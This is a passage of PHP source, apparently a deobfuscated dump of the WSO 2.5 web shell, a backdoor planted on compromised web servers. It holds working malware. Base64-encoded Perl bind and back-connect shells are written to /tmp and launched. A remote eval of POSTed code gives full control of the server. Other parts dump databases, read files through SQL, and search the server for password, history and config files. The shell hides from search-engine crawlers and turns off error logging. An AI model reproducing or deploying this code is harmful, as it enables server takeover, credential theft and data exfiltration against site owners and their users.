\$this->fetch(\$this->query(\"SELECT LOAD_FILE('\".addslashes(\$str).\"') as file\"));\n break;\n case 'pgsql':\n \$this->query(\"CREATE TABLE wso2(file text);COPY wso2 FROM '\".addslashes(\$str).\"';select file from wso2;\");\n \$r=array();\n while(\$i=\$this->fetch())\n \$r[] = \$i['file'];\n \$this->query('drop table wso2');\n return array('file'=>implode(\"\\n\",\$r));\n break;\n }\n return false;\n }\n function dump(\$table, \$fp = false) {\n switch(\$this->type)\t{\n case 'mysql':\n \$res = \$this->query('SHOW CREATE TABLE `'.\$table.'`');\n \$create = mysql_fetch_array(\$res);\n \$sql = \$create[1].\";\\n\";\n if(\$fp) fwrite(\$fp, \$sql); else echo(\$sql);\n \$this->query('SELECT * FROM `'.\$table.'`');\n \$i = 0;\n \$head = true;\n while(\$item = \$this->fetch()) {\n \$sql = '';\n if(\$i % 1000 == 0) {\n \$head = true;\n \$sql = \";\\n\\n\";\n }\n\n \$columns = array();\n foreach(\$item as \$k=>\$v) {\n if(\$v === null)\n \$item[\$k] = \"NULL\";\n elseif(is_int(\$v))\n \$item[\$k] = \$v;\n else\n \$item[\$k] = \"'\".@mysql_real_escape_string(\$v).\"'\";\n \$columns[] = \"`\".\$k.\"`\";\n }\n if(\$head) {\n \$sql .= 'INSERT INTO `'.\$table.'` ('.implode(\", \", \$columns).\") VALUES \\n\\t(\".implode(\", \", \$item).')';\n \$head = false;\n } else\n \$sql .= \"\\n\\t,(\".implode(\", \", \$item).')';\n if(\$fp) fwrite(\$fp, \$sql); else echo(\$sql);\n \$i++;\n }\n if(!\$head)\n if(\$fp) fwrite(\$fp, \";\\n\\n\"); else echo(\";\\n\\n\");\n break;\n case 'pgsql':\n \$this->query('SELECT * FROM '.\$table);\n while(\$item = \$this->fetch()) {\n \$columns = array();\n foreach(\$item as \$k=>\$v) {\n \$item[\$k] = \"'\".addslashes(\$v).\"'\";\n \$columns[] = \$k;\n }\n \$sql = 'INSERT INTO '.\$table.' ('.implode(\", \", \$columns).') VALUES ('.implode(\", \", \$item).');'.\"\\n\";\n if(\$fp) fwrite(\$fp, \$sql); else echo(\$sql);\n }\n break;\n }\n return false;\n }\n };\n \$db = new DbClass(\$_POST['type']);\n if((@\$_POST['p2']=='download') && (@\$_POST['p1']!='select')) {\n \$db->connect(\$_POST['sql_host'], \$_POST['sql_login'], \$_POST['sql_pass'], \$_POST['sql_base']);\n \$db->selectdb(\$_POST['sql_base']);\n switch(\$_POST['charset']) {\n case \"Windows-1251\": \$db->setCharset('cp1251'); break;\n case \"UTF-8\": \$db->setCharset('utf8'); break;\n case \"KOI8-R\": \$db->setCharset('koi8r'); break;\n case \"KOI8-U\": \$db->setCharset('koi8u'); break;\n case \"cp866\": \$db->setCharset('cp866'); break;\n }\n if(empty(\$_POST['file'])) {\n ob_start(\"ob_gzhandler\", 4096);\n header(\"Content-Disposition: attachment; filename=dump.sql\");\n header(\"Content-Type: text/plain\");\n foreach(\$_POST['tbl'] as \$v)\n \$db->dump(\$v);\n exit;\n } elseif(\$fp = @fopen(\$_POST['file'], 'w')) {\n foreach(\$_POST['tbl'] as \$v)\n \$db->dump(\$v, \$fp);\n fclose(\$fp);\n unset(\$_POST['p2']);\n } else\n die('<script>alert(\"Error! Can\\'t open file\");window.history.back(-1)</script>');\n }\n wsoHeader();\n echo \"\n\t<h1>Sql browser</h1><div class=content>\n\t<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\n\t<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\n\t<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='\". htmlspecialchars(\$GLOBALS['cwd']) .\"'><input type=hidden name=charset value='\". (isset(\$_POST['charset'])?\$_POST['charset']:'') .\"'>\n\t<td><select name='type'><option value='mysql' \";\n if(@\$_POST['type']=='mysql')echo 'selected';\n echo \">MySql</option><option value='pgsql' \";\n if(@\$_POST['type']=='pgsql')echo 'selected';\n echo \">PostgreSql</option></select></td>\n\t<td><input type=text name=sql_host value=\\\"\". (empty(\$_POST['sql_host'])?'localhost':htmlspecialchars(\$_POST['sql_host'])) .\"\\\"></td>\n\t<td><input type=text name=sql_login value=\\\"\". (empty(\$_POST['sql_login'])?'root':htmlspecialchars(\$_POST['sql_login'])) .\"\\\"></td>\n\t<td><input type=text name=sql_pass value=\\\"\". (empty(\$_POST['sql_pass'])?'':htmlspecialchars(\$_POST['sql_pass'])) .\"\\\"></td><td>\";\n \$tmp = \"<input type=text name=sql_base value=''>\";\n if(isset(\$_POST['sql_host'])){\n if(\$db->connect(\$_POST['sql_host'], \$_POST['sql_login'], \$_POST['sql_pass'], \$_POST['sql_base'])) {\n switch(\$_POST['charset']) {\n case \"Windows-1251\": \$db->setCharset('cp1251'); break;\n case \"UTF-8\": \$db->setCharset('utf8'); break;\n case \"KOI8-R\": \$db->setCharset('koi8r'); break;\n case \"KOI8-U\": \$db->setCharset('koi8u'); break;\n case \"cp866\": \$db->setCharset('cp866'); break;\n }\n \$db->listDbs();\n echo \"<select name=sql_base><option value=''></option>\";\n while(\$item = \$db->fetch()) {\n list(\$key, \$value) = each(\$item);\n echo '<option value=\"'.\$value.'\" '.(\$value==\$_POST['sql_base']?'selected':'').'>'.\$value.'</option>';\n }\n echo '</select>';\n }\n else echo \$tmp;\n }else\n echo \$tmp;\n echo \"</td>\n\t\t\t\t\t<td><input type=submit value='>>' onclick='fs(d.sf);'></td>\n\t <td><input type=checkbox name=sql_count value='on'\" . (empty(\$_POST['sql_count'])?'':' checked') . \"> count the number of rows</td>\n\t\t\t\t</tr>\n\t\t\t</table>\n\t\t\t<script>\n\t s_db='\".@addslashes(\$_POST['sql_base']).\"';\n\t function fs(f) {\n\t if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\n\t if(f.p1) f.p1.value='';\n\t if(f.p2) f.p2.value='';\n\t if(f.p3) f.p3.value='';\n\t }\n\t }\n\t\t\t\tfunction st(t,l) {\n\t\t\t\t\td.sf.p1.value = 'select';\n\t\t\t\t\td.sf.p2.value = t;\n\t if(l && d.sf.p3) d.sf.p3.value = l;\n\t\t\t\t\td.sf.submit();\n\t\t\t\t}\n\t\t\t\tfunction is() {\n\t\t\t\t\tfor(i=0;i<d.sf.elements['tbl[]'].length;++i)\n\t\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\n\t\t\t\t}\n\t\t\t</script>\";\n if(isset(\$db) && \$db->link){\n echo \"<br/><table width=100% cellpadding=2 cellspacing=0>\";\n if(!empty(\$_POST['sql_base'])){\n \$db->selectdb(\$_POST['sql_base']);\n echo \"<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>\";\n \$tbls_res = \$db->listTables();\n while(\$item = \$db->fetch(\$tbls_res)) {\n list(\$key, \$value) = each(\$item);\n if(!empty(\$_POST['sql_count']))\n \$n = \$db->fetch(\$db->query('SELECT COUNT(*) as n FROM '.\$value.''));\n \$value = htmlspecialchars(\$value);\n echo \"<nobr><input type='checkbox' name='tbl[]' value='\".\$value.\"'> <a href=# onclick=\\\"st('\".\$value.\"',1)\\\">\".\$value.\"</a>\" . (empty(\$_POST['sql_count'])?' ':\" <small>({\$n['n']})</small>\") . \"</nobr><br>\";\n }\n echo \"<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\\\"download\\\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>\";\n if(@\$_POST['p1'] == 'select') {\n \$_POST['p1'] = 'query';\n \$_POST['p3'] = \$_POST['p3']?\$_POST['p3']:1;\n \$db->query('SELECT COUNT(*) as n FROM ' . \$_POST['p2']);\n \$num = \$db->fetch();\n \$pages = ceil(\$num['n'] / 30);\n echo \"<script>d.sf.onsubmit=function(){st(\\\"\" . \$_POST['p2'] . \"\\\", d.sf.p3.value)}</script><span>\".\$_POST['p2'].\"</span> ({\$num['n']} records) Page # <input type=text name='p3' value=\" . ((int)\$_POST['p3']) . \">\";\n echo \" of \$pages\";\n if(\$_POST['p3'] > 1)\n echo \" <a href=# onclick='st(\\\"\" . \$_POST['p2'] . '\", ' . (\$_POST['p3']-1) . \")'>< Prev</a>\";\n if(\$_POST['p3'] < \$pages)\n echo \" <a href=# onclick='st(\\\"\" . \$_POST['p2'] . '\", ' . (\$_POST['p3']+1) . \")'>Next ></a>\";\n \$_POST['p3']--;\n if(\$_POST['type']=='pgsql')\n \$_POST['p2'] = 'SELECT * FROM '.\$_POST['p2'].' LIMIT 30 OFFSET '.(\$_POST['p3']*30);\n else\n \$_POST['p2'] = 'SELECT * FROM `'.\$_POST['p2'].'` LIMIT '.(\$_POST['p3']*30).',30';\n echo \"<br><br>\";\n }\n if((@\$_POST['p1'] == 'query') && !empty(\$_POST['p2'])) {\n \$db->query(@\$_POST['p2']);\n if(\$db->res !== false) {\n \$title = false;\n echo '<table width=100% cellspacing=1 cellpadding=2 class=main style=\"background-color:#292929\">';\n \$line = 1;\n while(\$item = \$db->fetch())\t{\n if(!\$title)\t{\n echo '<tr>';\n foreach(\$item as \$key => \$value)\n echo '<th>'.\$key.'</th>';\n reset(\$item);\n \$title=true;\n echo '</tr><tr>';\n \$line = 2;\n }\n echo '<tr class=\"l'.\$line.'\">';\n \$line = \$line==1?2:1;\n foreach(\$item as \$key => \$value) {\n if(\$value == null)\n echo '<td><i>null</i></td>';\n else\n echo '<td>'.nl_two_areabr(htmlspecialchars(\$value)).'</td>';\n }\n echo '</tr>';\n }\n echo '</table>';\n } else {\n echo '<div><b>Error:</b> '.htmlspecialchars(\$db->error()).'</div>';\n }\n }\n echo \"<br></form><form onsubmit='d.sf.p1.value=\\\"query\\\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>\";\n if(!empty(\$_POST['p2']) && (\$_POST['p1'] != 'loadfile'))\n echo htmlspecialchars(\$_POST['p2']);\n echo \"</textarea><br/><input type=submit value='Execute'>\";\n echo \"</td></tr>\";\n }\n echo \"</table></form><br/>\";\n if(\$_POST['type']=='mysql') {\n \$db->query(\"SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'\");\n if(\$db->fetch())\n echo \"<form onsubmit='d.sf.p1.value=\\\"loadfile\\\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='tools_inp_area' type=text name=f><input type=submit value='>>'></form>\";\n }\n if(@\$_POST['p1'] == 'loadfile') {\n \$file = \$db->loadFile(\$_POST['p2']);\n echo '<br/><pre class=ml_one_area>'.htmlspecialchars(\$file['file']).'</pre>';\n }\n } else {\n echo htmlspecialchars(\$db->error());\n }\n echo '</div>';\n wsoFooter();\n }\n function actionNetwork() {\n wsoHeader();\n \$back_connect_p=\"IyEvdXNyl_two_areaJpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnl_two_areaJpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7\";\n \$bind_port_p=\"IyEvdXNyl_two_areaJpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=\";\n echo \"<h1>Network tools</h1><div class=content>\n\t\t<form name='nfp' onSubmit=\\\"g(null,null,'bpp',this.port.value);return false;\\\">\n\t\t<span>Bind port to /bin/sh [perl]</span><br/>\n\t\tPort: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\n\t\t</form>\n\t\t<form name='nfp' onSubmit=\\\"g(null,null,'bcp',this.server.value,this.port.value);return false;\\\">\n\t\t<span>Back-connect [perl]</span><br/>\n\t\tServer: <input type='text' name='server' value='\". \$_SERVER['REMOTE_ADDR'] .\"'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\n\t\t</form><br>\";\n if(isset(\$_POST['p1'])) {\n function cf(\$f,\$t) {\n \$w = @fopen(\$f,\"w\") or @function_exists('file_put_contents');\n if(\$w){\n @fwrite(\$w,@base64_decode(\$t));\n @fclose(\$w);\n }\n }\n if(\$_POST['p1'] == 'bpp') {\n cf(\"/tmp/bp.pl\",\$bind_port_p);\n \$out = wsoEx(\"perl /tmp/bp.pl \".\$_POST['p2'].\" 1>/dev/null 2>&1 &\");\n sleep(1);\n echo \"<pre class=ml_one_area>\$out\\n\".wsoEx(\"ps aux | grep bp.pl\").\"</pre>\";\n unlink(\"/tmp/bp.pl\");\n }\n if(\$_POST['p1'] == 'bcp') {\n cf(\"/tmp/bc.pl\",\$back_connect_p);\n \$out = wsoEx(\"perl /tmp/bc.pl \".\$_POST['p2'].\" \".\$_POST['p3'].\" 1>/dev/null 2>&1 &\");\n sleep(1);\n echo \"<pre class=ml_one_area>\$out\\n\".wsoEx(\"ps aux | grep bc.pl\").\"</pre>\";\n unlink(\"/tmp/bc.pl\");\n }\n }\n echo '</div>';\n wsoFooter();\n }\n function actionRC() {\n if(!@\$_POST['p1']) {\n \$a = array(\n \"uname\" => php_uname(),\n \"php_version\" => phpversion(),\n \"safemode\" => @ini_get('safe_mode')\n );\n echo serialize(\$a);\n } else {\n eval(\$_POST['p1']);\n }\n }\n if( empty(\$_POST['a']) )\n if(isset(\$default_action) && function_exists('action' . \$default_action))\n \$_POST['a'] = \$default_action;\n else\n \$_POST['a'] = 'SecInfo';\n if( !empty(\$_POST['a']) && function_exists('action' . \$_POST['a']) )\n call_user_func('action' . \$_POST['a']);\n exit;\n";
eval /* PHPDeobfuscator eval output */ {
error_reporting(E_ALL);
ini_set("display_errors", 1);
$auth_pass = "4297f44b13955235245b2497399d7a93";
$color = "#df5";
$default_action = 'ff_man';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if (preg_match("/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i", $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@define('WSO_VERSION', '2.5');
if (get_magic_quotes_gpc()) {
function WSOstripslashes($array)
{
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin()
{
die("<div align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></div>");
}
function WSOsetcookie($k, $v)
{
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if (!empty($auth_pass)) {
if (isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) {
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
}
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass) {
wsoLogin();
}
}
if (strtolower("PHP") == "win") {
$os = 'win';
} else {
$os = 'nix';
}
$safe_mode = @ini_get('safe_mode');
if (!$safe_mode) {
error_reporting(0);
}
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c'])) {
@chdir($_POST['c']);
}
$cwd = @getcwd();
if ($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if ($cwd[strlen($cwd) - 1] != '/') {
$cwd .= '/';
}
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) {
$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $default_use_ajax;
}
if ($os == 'win') {
$aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all");
} else {
$aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv");
}
function wsoHeader()
{
if (empty($_POST['charset'])) {
$_POST['charset'] = $GLOBALS['default_charset'];
}
global $color;
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - admin </title>\n\t<style>\n\tbody{background-color:#445;color:#e2e2e2;}\n\tbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\n\ttable.info{ color:#fff;background-color:#222; }\n\tspan,h1,a{ color: {$color} !important; }\n\tspan{ font-weight: bolder; }\n\th1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\n\tdiv.content{ padding: 5.5px;margin-left:5.5px;background-color:#444; }\n\ta{ text-decoration:none; }\n\ta:hover{ text-decoration:underline; }\n\t.ml_one_area{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\n\t.area_main{ width:100%;height:300px; }\n\tinput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9.5pt Monospace,'Courier New'; }\n\tform{ margin:0px; }\n\t#tools_table_area{ text-align:center; }\n\t.tools_inp_area{ width: 300px }\n\t.main th{text-align:left;background-color:#5e5e5e;}\n\t.main tr:hover{background-color:#5e5e5e}\n\t.l_one_area{background-color:#444}\n\t.l_two_area{background-color:#333}\n\t</style>\n\t<script>\n\t var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\n\t var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\n\t var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\n\t var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\n\t var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\n\t var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\n\t var d = document;\n\t\tfunction set(a,c,p1,p2,p3,charset) {\n\t\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\n\t\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\n\t\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\n\t\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\n\t\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\n\t\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\n\t\t}\n\t\tfunction g(a,c,p1,p2,p3,charset) {\n\t\t\tset(a,c,p1,p2,p3,charset);\n\t\t\td.mf.submit();\n\t\t}\n\t\tfunction a(a,c,p1,p2,p3,charset) {\n\t\t\tset(a,c,p1,p2,p3,charset);\n\t\t\tvar params = 'ajax=true';\n\t\t\tfor(i=0;i<d.mf.elements.length;i++)\n\t\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\n\t\t\tsr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);\n\t\t}\n\t\tfunction sr(url, params) {\n\t\t\tif (window.XMLHttpRequest)\n\t\t\t\treq = new XMLHttpRequest();\n\t\t\telse if (window.ActiveXObject)\n\t\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\n\t if (req) {\n\t req.onreadystatechange = processReqChange;\n\t req.open('POST', url, true);\n\t req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\n\t req.send(params);\n\t }\n\t\t}\n\t\tfunction processReqChange() {\n\t\t\tif( (req.readyState == 4) )\n\t\t\t\tif(req.status == 200) {\n\t\t\t\t\tvar reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');\n\t\t\t\t\tvar arr=reg.exec(req.responseText);\n\t\t\t\t\teval(arr[2].substr(0, arr[1]));\n\t\t\t\t} else alert('Request error!');\n\t\t}\n\t</script>\n\t<head><body><div id='main_default' style='display:block;position:absolute;width:100%;background-color:#555;top:0;left:0;'>\n\t<form method=post name=mf style='display:none;'>\n\t<input type=hidden name=a>\n\t<input type=hidden name=c>\n\t<input type=hidden name=p1>\n\t<input type=hidden name=p2>\n\t<input type=hidden name=p3>\n\t<input type=hidden name=charset>\n\t</form>";
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace ? $totalSpace : 1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$explink = 'http://exploit-db.com/search/?action=search&filter_description=';
if (strpos('Linux', $kernel) !== false) {
$explink .= urlencode('Linux Kernel ' . substr($release, 0, 6));
} else {
$explink .= urlencode($kernel . ' ' . substr($release, 0, 3));
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n = count($path);
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"ff_man\",\"";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . '/';
}
$cwd_links .= "\")'>" . $path[$i] . "/</a>";
}
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach ($charsets as $item) {
$opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
}
$m = array('Sec. Info' => 'SecInfo', 'Files' => 'ff_man', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network');
if (!empty($GLOBALS['auth_pass'])) {
$m['Logout'] = 'Logout';
}
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach ($m as $k => $v) {
$menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
}
$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach (range('c', 'z') as $drive) {
if (is_dir($drive . ':\\')) {
$drives .= '<a href="#" onclick="g(\'ff_man\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
}
}
}
echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'ff_man\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
}
function wsoFooter()
{
$is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'></font>" : "Yes<font color=red>(Not)</font>";
echo "\n\t</div>\n\t<table class=info id=tools_table_area cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\n\t\t<tr>\n\t\t\t<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>ch:</span><br><input class='tools_inp_area' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>\n\t\t\t<td><form onsubmit=\"g('ff_tools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='tools_inp_area' type=text name=f><input type=submit value='>>'></form></td>\n\t\t</tr><tr>\n\t\t\t<td><form onsubmit=\"g('ff_man',null,'mkdir',this.d.value);return false;\"><span>mdir:</span>{$is_writable}<br><input class='tools_inp_area' type=text name=d><input type=submit value='>>'></form></td>\n\t\t\t<td><form onsubmit=\"g('ff_tools',null,this.f.value,'mkfile');return false;\"><span>Mfile:</span>{$is_writable}<br><input class='tools_inp_area' type=text name=f><input type=submit value='>>'></form></td>\n\t\t</tr><tr>\n\t\t\t<td><form onsubmit=\"g('cns',null,this.c.value);return false;\"><span>ex:</span><br><input class='tools_inp_area' 